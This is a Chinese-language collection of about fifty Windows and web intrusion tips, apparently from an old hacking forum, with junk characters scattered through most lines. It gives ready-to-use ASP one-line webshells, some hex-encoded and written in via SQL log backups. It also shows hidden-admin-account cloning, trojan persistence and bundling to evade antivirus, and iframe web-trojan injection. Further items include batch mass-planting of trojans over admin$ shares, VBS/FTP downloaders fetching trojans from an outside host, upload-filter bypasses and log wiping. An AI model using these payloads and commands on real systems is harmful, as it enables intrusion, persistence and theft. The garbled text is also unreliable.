1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
$ G# s F3 a/ Q7 }' \cacls C:\windows\system32 /G hqw20:R ]6 }" r, Y! m/ p C- o
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
& p7 @- C7 [1 y4 w* o F恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F: H2 I+ c+ j4 w+ m0 V" J
: d" D4 ~# y; j1 Q# @
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
8 C; W& S: m/ Q" x( Z. ^9 R
7 Q) }7 p, M5 v4 N- M6 u3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
, B# \3 Q9 ^8 d* e7 m t$ l {8 r4 M7 O" B
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号& M7 k: P/ ~' \1 g' f. p
, u4 o5 G2 C/ m8 a& @7 t5 h
5、利用INF文件来修改注册表9 S/ S- E! I. [5 x( c# k
[Version]5 F1 t# e2 e: V9 [6 c
Signature="$CHICAGO$"5 L# Z9 c9 F, N9 i$ V, H: t) U- W9 ]
[Defaultinstall]
0 w3 m" Z' g7 u& {addREG=Ating9 O0 E A4 H, E& ~
[Ating]
2 [+ L" X( Q; l* s1 a u6 C; bHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"( _0 P9 t O8 e! S; S
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
: E# _; q/ ~4 e' qrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径 q* N1 [8 E6 y( k$ I/ C
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
3 N, ?$ S- T9 S: }; Z) Q% hHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
0 B% G# c; m9 XHKEY_CURRENT_CONFIG 简写为 HKCC
* G! r* `7 U: U2 `$ @& O- ~# o5 K0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值0 }; v1 d }/ q2 w4 I) A' U* A
"1"这里代表是写入或删除注册表键值中的具体数据- J* O! U. C$ r( P4 w. I
; V9 I' I$ q$ U4 G1 w( F
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,) S, X N0 \4 F4 B
多了一步就是在防火墙里添加个端口,然后导出其键值 ?1 { r" q2 B
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
3 U# P0 y3 R! \* ^4 l/ ]% Q/ G( z, p' Q3 D
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽, p' U, `1 y- \9 i$ Z/ y( s+ p
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
0 a- u0 l& z( [0 M/ n+ S9 y
$ K! h' h; L: V4 v- o8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
( Z+ h ]) m7 I) g6 _1 D2 @+ A# G# d+ u' ?) u' @. k# [, C8 `- X
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
* r) u* v" O4 y7 R可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
3 s3 p+ A! p* t- R# P
: Y) [1 A3 W) T9 P& P10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
4 B5 {5 K4 A' U7 a( O5 j
4 ?# T; W4 z. t$ w11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,8 U. P6 }$ p% Z0 n; c$ A" _
用法:xsniff –pass –hide –log pass.txt
- ~7 X3 [& [% m7 T, b' d7 U" }6 h) ~+ Q- v, d1 `
12、google搜索的艺术
- e5 ~8 w: X4 U* d$ U8 C/ u/ b搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”- N0 Y9 Z- t: w e# \' C3 p
或“字符串的语法错误”可以找到很多sql注入漏洞。 u0 z- z( a) I& G; p9 P8 h* o
- d) ]8 e2 v- E$ Y8 V# z
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。5 _# [6 m' t: R7 L6 [
) {7 P9 W( S( v c+ k! O7 A
14、cmd中输入 nc –vv –l –p 1987
& y; J# U) ? C# a8 |" E4 ^) ]; l, _做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
7 K* K4 @. ]* F8 K4 \
I4 a; T9 Z8 R' X0 W( Z t5 e15、制作T++木马,先写个ating.hta文件,内容为
( Z* o: f5 p2 v& J% ?<script language="VBScript">
7 ?6 X; \( h' Y# `& m/ vset wshshell=createobject ("wscript.shell" ), [& h- q: C" @$ X: {
a=wshshell.run("你马的名称",1)( b# }0 m8 r4 a# a* s" j
window.close& Y2 g& ?$ j# q0 E' x
</script>
: ^7 Y& S0 [& \: ~4 a: _再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
h6 c1 T' s7 ?1 b6 \& G" d: _1 ]7 W& V& `) i+ Q
16、搜索栏里输入
. }- b7 l# f1 N' z( _关键字%'and 1=1 and '%'='
* G& S. G' ^5 m& I, | e4 o7 @关键字%'and 1=2 and '%'='; K8 ?) w; [' I; b" r9 R u2 z
比较不同处 可以作为注入的特征字符
O' U( d8 L/ M# T( S, K3 K* p1 _ } i N, u
17、挂马代码<html>. h/ b4 K+ T2 M/ a9 R8 q
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>8 c* ]. j q- l# U$ M' p
</html>* {7 z- n' p; `# F) |3 X9 ^
8 q8 }0 i5 X7 a8 Z7 a
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆, _3 `- {) \7 G% l" b* C( {4 v7 X
net localgroup administrators还是可以看出Guest是管理员来。6 v* k* v- ]9 t: \
/ E* @* j$ c3 S. {& S
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
7 s7 U! @1 o8 `7 n) R& c5 x用法: 安装: instsrv.exe 服务名称 路径
; i# c. ]; ]" k$ E4 h& w卸载: instsrv.exe 服务名称 REMOVE' u& v6 U* _. U# U8 [
. F! Q% I1 y0 t* {
! o9 ?" N" n5 l9 K1 h# B h5 V$ E21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉: q8 N. O/ [ i
不能注入时要第一时间想到%5c暴库。
' p+ A& B0 u+ U& S* R9 p
* Z6 \+ v+ t6 ]+ C5 v( K( t5 E22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~( B. U: k7 K6 y- V0 u2 y
" @* g( D0 a9 I8 |$ W! d5 s' v23、缺少xp_cmdshell时- c' a3 i. @1 Q& K( e3 n3 K
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
9 P* M; a. ?0 v! n; b- G \ k假如恢复不成功,可以尝试直接加用户(针对开3389的)5 [ n& s f* C k b( S H
declare @o int
( ]+ C/ k9 @9 E( x3 ]7 z, qexec sp_oacreate 'wscript.shell',@o out/ r7 y. z) `) A
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
' e( b& \" r2 W- o. {% n. V5 p0 n. F! C; Z
24.批量种植木马.bat' |5 `2 o s2 i4 ?' ]# [" Q
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中/ Z% ?0 W. M3 G* _4 S6 p
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
+ I% d$ ^1 F- f扫描地址.txt里每个主机名一行 用\\开头) t1 @$ c5 d3 x5 I) M
9 O6 K: Z+ d- k \% Q; D, f( m' j25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
; X+ a) m* `7 ^4 c( T$ y; {* X& J$ ?0 u2 Y; I
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.! O4 { N' |3 H& X0 H5 y
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
' K2 K" d. p9 J1 `: [1 H.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
! w' G$ e% E8 e! X4 X3 m. @- T1 b/ x7 s
/ Y& E! w6 o( |5 l% d27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP# A2 u: u5 {3 T( d
然后用#clear logg和#clear line vty *删除日志, Q) _. f( n5 I% o+ i k- d
% h( p' `# d! o3 |28、电脑坏了省去重新安装系统的方法
+ L6 D1 P" P3 Z$ y- |, T" [& C \纯dos下执行,8 @9 }& T2 q i5 k# n0 S! \9 V( }
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
6 E0 B1 ]* P" `9 c6 W0 m/ o2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
9 k M0 a% `2 ^) V8 `' @& q6 {* d& Y- S6 h$ W$ x" G
29、解决TCP/IP筛选 在注册表里有三处,分别是:
6 d3 h/ K% w- v9 Z7 O+ F4 B4 b, D3 wHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip' o1 _5 a( t" q6 g. E! E
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
; x! T& p+ M: ^4 cHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; Q- L8 f; d7 r1 _分别用& m. ], R' [; b9 h6 r/ B8 s- f) O
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip) S. S- s+ V7 r t* N7 I" [8 Y/ V
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip! H+ j% V! Q. [8 i
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
, F5 u& e* q% g6 G命令来导出注册表项' Y- {8 A* w2 W. [
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
0 I: E# E% |* J% _' o/ j8 d% b改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用 \4 q3 V. s# x* ~8 z5 [: J7 z
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
+ O) [( C2 ~$ p) R
( a# y% J8 i, C3 Z( |30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
4 k; d6 p6 q/ HSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3$ h0 e3 H* | [+ a& K) B
2 w3 W, [" a' R6 _
31、全手工打造开3389工具- i3 E/ d1 O3 _+ v2 e- b; Y# X
打开记事本,编辑内容如下:0 d4 m. T+ W' J/ \, c
echo [Components] > c:\sql
+ @+ ]1 K. S. a0 ]echo TSEnable = on >> c:\sql, s0 L3 Y4 l1 H$ k
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q/ p4 P% u( I) N- Q
编辑好后存为BAT文件,上传至肉鸡,执行
1 W# _5 |+ B* s; B' E+ g' w
" {9 m& ?+ X+ [+ v) ]9 ?32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
5 `; \# x+ Z4 F
* |, A6 m$ G' w5 n33、让服务器重启
c0 g9 ^; w1 |# T1 G写个bat死循环:
: M( J. T. i# e@echo off
" ~9 G4 Y) c. k' b( f:loop1
& N5 a: z9 l( I7 I' T, V, lcls4 d: k+ B% k9 M3 N, U
start cmd.exe" E. h! T2 l8 t* s2 o
goto loop1
% T0 @- q* I. a' p保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
# r D$ Q' A% C8 u- T8 n' O3 e( i0 b9 v2 f D
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,9 p5 o, ?* R! V, c* K$ m1 L, Z
@echo off
* O) ?' f$ V7 Ndate /t >c:/3389.txt
( y3 U4 x; ?8 e: M0 T( G% ktime /t >>c:/3389.txt! Q) a3 M( X0 E' Z# v4 ?0 \- o9 o7 i0 _
attrib +s +h c:/3389.bat
4 ]* J0 I: N( o* w2 g. R; Yattrib +s +h c:/3389.txt
1 l" Q% o9 {, R6 b! znetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt, l9 b: u/ N, v- t# ^: b
并保存为3389.bat2 e; X0 l. y; b) w. z4 \
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
$ \' {% v6 ~ E
/ D7 x0 _( j/ E, p2 f: u; ~4 R) E( @35、有时候提不了权限的话,试试这个命令,在命令行里输入:
& T! {7 E- f1 @* d8 P# ~start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
! i7 N4 N' A# {9 X" i2 T+ x输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
6 T; l7 @4 k6 H% w$ {9 |7 P4 | i
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
, _( r" ]8 P& |7 m9 d5 ^) |echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
8 U; Z C1 [7 N5 }3 g: [echo 你的FTP账号 >>c:\1.bat //输入账号& M/ R) z4 V7 L! o6 s
echo 你的FTP密码 >>c:\1.bat //输入密码
/ }8 y6 n6 l( }' }" f$ recho bin >>c:\1.bat //登入
- q% @8 E2 G: w" ?echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
8 q- X/ M' e+ u2 `3 Lecho bye >>c:\1.bat //退出. n; h/ ?/ f; {. F) o5 w
然后执行ftp -s:c:\1.bat即可$ q6 A, d" R" a9 v: V; D
8 i& M6 _2 r4 p2 B- n& f9 B8 g
37、修改注册表开3389两法2 h1 |+ I( ^7 j' \
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表7 }( n! B/ K* \; @
echo Windows Registry Editor Version 5.00 >>3389.reg
! I, f: m3 l0 O4 U+ J5 \8 techo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg! q. J! s5 O1 g K6 A
echo "Enabled"="0" >>3389.reg8 j* r4 ?$ O/ s& b C6 Q2 ?8 O
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows7 D- b" j& D- ~5 \. z8 q
NT\CurrentVersion\Winlogon] >>3389.reg
# j) u9 K+ s+ J6 E0 cecho "ShutdownWithoutLogon"="0" >>3389.reg' n& J. o. ^* R( R) z
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
; @8 [- T# m' N/ x! ]8 C: n. I$ ?$ U, O>>3389.reg9 Y( n; g2 G- ], ^
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg+ L/ ]+ M2 w) i0 S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
! N% d+ `0 o/ ?, d u>>3389.reg
1 L2 `5 |0 H, w0 i( decho "TSEnabled"=dword:00000001 >>3389.reg
6 _1 q* u4 h$ q' techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
& {2 g; l! n# eecho "Start"=dword:00000002 >>3389.reg
- Z/ w# P4 |5 x0 w- f3 ]echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
+ {, ~' x: M( A>>3389.reg. Y, @' U9 t! Q- z0 y# W
echo "Start"=dword:00000002 >>3389.reg
2 i* U, h5 P# w# E9 v5 uecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg& ~- x( A% j% j: d7 T3 ~3 s
echo "Hotkey"="1" >>3389.reg+ r7 n T9 p2 A7 v g" c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( c, v( L+ N$ P0 O0 G: T/ n( ~
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
) ^5 Z1 T3 [6 aecho "PortNumber"=dword:00000D3D >>3389.reg, u8 r8 M* L9 f4 J7 i1 Z- M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal, ` C0 \8 c0 c% _
Server\WinStations\RDP-Tcp] >>3389.reg" n' t6 e1 L( a! |9 ^( c7 J* f
echo "PortNumber"=dword:00000D3D >>3389.reg- g) J! F8 p8 N& C& N
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
/ f, s8 c) r! X r(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
# V( R! I( M) D因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效1 L- N" l& N2 @* _* |2 k8 _7 m* _; g
(2)winxp和win2003终端开启
- h; P4 {1 W+ v) A1 Z1 K- R用以下ECHO代码写一个REG文件:
9 F. O; ]. N# H! Cecho Windows Registry Editor Version 5.00>>3389.reg7 S! U6 @1 @0 B7 A# q( \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; e" w. x. k D3 J' ^Server]>>3389.reg
& I1 |+ h& l- R" {$ Y fecho "fDenyTSConnections"=dword:00000000>>3389.reg) B& c2 [! o+ O/ i! ~. w* h- H/ e; b
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 G& c$ U N0 L9 j
Server\Wds\rdpwd\Tds\tcp]>>3389.reg" g$ ^; ~: k; ^% Z v2 v/ c
echo "PortNumber"=dword:00000d3d>>3389.reg$ Y: \* k. c1 o. v/ u
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 F$ X/ l P" {
Server\WinStations\RDP-Tcp]>>3389.reg
' u% V9 N2 y+ Y( \$ ~5 g5 vecho "PortNumber"=dword:00000d3d>>3389.reg' L6 O9 h- r1 _# }. o0 [( y
然后regedit /s 3389.reg del 3389.reg
1 _2 I) G2 a8 T& Y* E( t4 KXP下不论开终端还是改终端端口都不需重启. F; j8 p4 J7 U1 S3 a& D
/ K: r, Z" {6 a$ ^- n
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
- P+ `0 R& X; G* I6 D用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
/ P8 h Y; S4 H' c2 g# @" @; I
7 Z. M$ b1 m6 Q) l* `6 f39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!+ R5 p9 e) q# x3 S& ~; s
(1)数据库文件名应复杂并要有特殊字符
* `3 T$ G. A' E5 y5 M; P6 y(2)不要把数据库名称写在conn.asp里,要用ODBC数据源* E, C/ o2 q: c/ f5 o; N3 B( W
将conn.asp文档中的% M% m6 }1 h4 w
DBPath = Server.MapPath("数据库.mdb")
+ W1 x4 L, L+ Iconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath' L) O% K/ N5 O! C
% t# _# K' g) c# j5 d修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
- e* U4 N- }. e6 \0 z8 `(3)不放在WEB目录里0 T m# h' h; V% `; |! i- u
( {& ~" P) Y% F5 x40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉5 M6 f% C7 M& l( N( z2 s# [) D
可以写两个bat文件* h3 b' z& C4 Y& p( v; N l# b
@echo off9 q) b( {) X( o) g- R
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
0 m2 ?* S$ S# s5 J4 K: i@del c:\winnt\system32\query.exe
6 \2 r# Y6 `% B# x' N@del %SYSTEMROOT%\system32\dllcache\query.exe
" t* {1 i7 b* K@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
* ?+ \) a9 h4 n- ^2 O; N0 ~% k4 X
@echo off
, f7 M- P9 K# f, e0 w@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe! X. W2 M' {: R* u
@del c:\winnt\system32\tsadmin.exe
% ]3 k2 U: Q+ [8 R. P1 W% F@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex% b- |) y# j; E3 I
" b" w1 O+ ^% ^41、映射对方盘符
& D* C- w, I6 m6 ^9 s$ S" V! p) ?; ytelnet到他的机器上,
2 E4 \2 k: v L/ Z$ qnet share 查看有没有默认共享 如果没有,那么就接着运行
* Y2 ?6 Z* C7 inet share c$=c:
- r& g' w4 {. ^net share现在有c$
5 I) X. Q% j+ ?$ D3 w1 @+ a在自己的机器上运行" ?# E6 _6 d" y+ q! V
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K# g4 ]) H1 X7 s. d- k
: I3 P5 |. S; \$ B42、一些很有用的老知识
+ t' B: |* |2 F8 Q! D6 f# E" g) }type c:\boot.ini ( 查看系统版本 )+ l- i4 X0 w4 U8 P
net start (查看已经启动的服务)
2 K$ F# o2 }1 G5 [query user ( 查看当前终端连接 )
1 Q6 }0 ?! D- B% @* Rnet user ( 查看当前用户 )
4 [5 R9 j* t8 d0 @) Y! E$ Nnet user 用户 密码/add ( 建立账号 )
c) _7 A" X1 g1 tnet localgroup administrators 用户 /add (提升某用户为管理员)* j0 `7 y$ d+ g" w
ipconfig -all ( 查看IP什么的 )
) [; {# E2 _5 O7 ]netstat -an ( 查看当前网络状态 )) Q/ @5 X0 f e9 E. D `
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
8 `$ q/ U( ]5 o4 v克隆时Administrator对应1F4
/ m# U. S5 N" z$ G" \guest对应1F5
7 P* {! @* a6 ?tsinternetuser对应3E8
: u+ F5 N# f( e+ O2 h: B' I- i; C6 p! m2 p
43、如果对方没开3389,但是装了Remote Administrator Service z2 W, `8 F" p9 [& s4 ]4 U
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接& O- `3 `, U1 k; y! w2 u! o: x4 q
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
N2 ]8 x7 c" U6 g6 T先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
' {! J( x# n, @7 A- g5 p u/ W
/ S2 ^4 a( x4 w# J44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
+ t- D$ a D+ f. N, n; r$ M9 p本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
/ n+ V: A4 H( m' C; {5 G, y g6 O% l- u& v
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入), d: C) V* h' r7 p1 f2 L
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
% h8 D2 s( \4 g^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =- {2 g9 J4 `1 |# U9 c5 E
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
! T' D3 l9 s8 o! I+ `+ S1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
0 [; E- }7 Y' z$ P1 e! g. z) y- d(这是完整的一句话,其中没有换行符)2 ^; P5 w' n8 @+ |2 {- }; L6 g4 T
然后下载:( Q0 U7 l6 \& q2 t9 K
cscript down.vbs http://www.hack520.org/hack.exe hack.exe" Q q9 w Z1 W2 |! t
M" l; y+ {& u: G z1 @4 o
46、一句话木马成功依赖于两个条件:
3 C7 N6 }4 |2 w/ ]& {! ~, q1、服务端没有禁止adodb.Stream或FSO组件9 j9 }6 U3 ~- g5 Z/ a
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
# e- ~. l$ k% M. Q6 h
* D0 L) C8 u' U" X# ~47、利用DB_OWNER权限进行手工备份一句话木马的代码:
; m( D! B; u$ ?) y# W- J- i- \/ x;alter database utsz set RECOVERY FULL--3 m9 H; `* L. M9 k. N
;create table cmd (a image)--
, Z, |7 l, p9 c8 Y;backup log utsz to disk = 'D:\cmd' with init-- l2 w" h, V; \6 {0 \# U
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--# a: W/ X+ l0 g( f2 t* ^
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--9 S# r& }/ Q1 A! G2 i/ A& _
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。. I5 c! Q y# C! d: Y+ k
, l- ^& u! N7 J0 F; M6 o48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:5 p" K9 ^" T; n* c* ]
! S7 A! @* k* U5 p& Y用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options' @/ R" G6 n/ E+ ~4 [" x# a& ~
所有会话用 'all'。0 a: e$ L4 [7 p( N% |. g
-s sessionid 列出会话的信息。; j4 n: l- N4 P/ H0 c7 Q: ~% W' _
-k sessionid 终止会话。5 m; r6 f3 P: D8 h) x
-m sessionid 发送消息到会话。
8 u7 c) l: |+ C+ c
* Z# d0 O: J; p+ zconfig 配置 telnet 服务器参数。
$ P! [* ]/ S# S; k9 }; C. ]; A' Z
, h, D# U( M; i8 \" Y3 _common_options 为:: A6 ]0 ?3 r, ~1 W
-u user 指定要使用其凭据的用户
( d0 v1 k4 i. [7 V3 `- e* [-p password 用户密码; [" t4 Y5 h e5 L
8 v) i4 j& {! A. Z; S% _- P7 Nconfig_options 为:
9 S5 N* p1 Z3 z0 T3 G% ~) p! N Vdom = domain 设定用户的默认域$ Q/ i# {+ y% u& {& C& Q4 w
ctrlakeymap = yes|no 设定 ALT 键的映射
, G+ Z8 {3 n& o+ N$ D- Y) Q4 @# d0 Utimeout = hh:mm:ss 设定空闲会话超时值
~, D; d& Y: h: j/ ?5 Gtimeoutactive = yes|no 启用空闲会话。
J" ]8 _. f6 @$ s* t& Z) Lmaxfail = attempts 设定断开前失败的登录企图数。
& ?0 t/ }; G: [0 emaxconn = connections 设定最大连接数。
: Y1 a$ x; U6 y8 Dport = number 设定 telnet 端口。
- n6 G4 v w. x R( jsec = [+/-]NTLM [+/-]passwd
$ ]/ D' F' M1 G' I" X" T6 A1 h设定身份验证机构
2 U, b1 n5 G- K8 }1 P' o4 e& Xfname = file 指定审计文件名。( ^% `' q6 [* e5 j: {2 F( ^
fsize = size 指定审计文件的最大尺寸(MB)。6 a2 r' K4 b0 f Y- H
mode = console|stream 指定操作模式。( h3 n. k& r' s0 p) A! `6 x5 P
auditlocation = eventlog|file|both
4 l5 S$ B- a, k! l5 T, |! D指定记录地点. R7 U& p3 r5 i3 d# R
audit = [+/-]user [+/-]fail [+/-]admin
* U# X* A1 m1 R, ~
, ]; _9 w) p5 I+ O, M/ {49、例如:在IE上访问:
4 N/ j1 W- Z2 v" Rwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/8 W4 D/ b4 b. q: E3 Q# M: ]3 R
hack.txt里面的代码是:
5 D4 a# J5 |7 W<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">+ D" Q4 D) m: y5 I& w2 V
把这个hack.txt发到你空间就可以了!9 g: {1 H6 `, q+ {# G
这个可以利用来做网马哦!
- t q" ~- E9 I6 {! Z/ ~1 A
/ }: r6 y y* `* q$ i50、autorun的病毒可以通过手动限制!
, ^# O$ }5 Z% c N& [9 F: b1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!+ O& r, X9 W; m" L2 ]0 c
2,打开盘符用右键打开!切忌双击盘符~7 g9 T' R6 q- k7 ?- i
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!' n8 @5 V- j4 R! S# ?# c" H2 w4 g, n! @
0 o) ?" s. x" o% Z+ R+ u/ D6 p
51、log备份时的一句话木马:
4 y0 I. Q% k6 {- h( }% J# ra).<%%25Execute(request("go"))%%25>
$ V# p. }% q* U+ pb).<%Execute(request("go"))%>
) u1 [. a6 y4 I0 tc).%><%execute request("go")%><%
+ U! R+ Q5 G: ed).<script language=VBScript runat=server>execute request("sb")</Script>
7 A( D1 I5 }: u% h( P# z6 B/ t9 E, `e).<%25Execute(request("l"))%25>
% _3 D) {; G. Z8 x) F* df).<%if request("cmd")<>"" then execute request("pass")%>
: \8 ?8 ?5 G7 o$ F) ?- m
5 w, w) {; K) ^0 A0 {3 c) P52、at "12:17" /interactive cmd! E8 r% w/ [/ x& ^% W* b* H
执行后可以用AT命令查看新加的任务
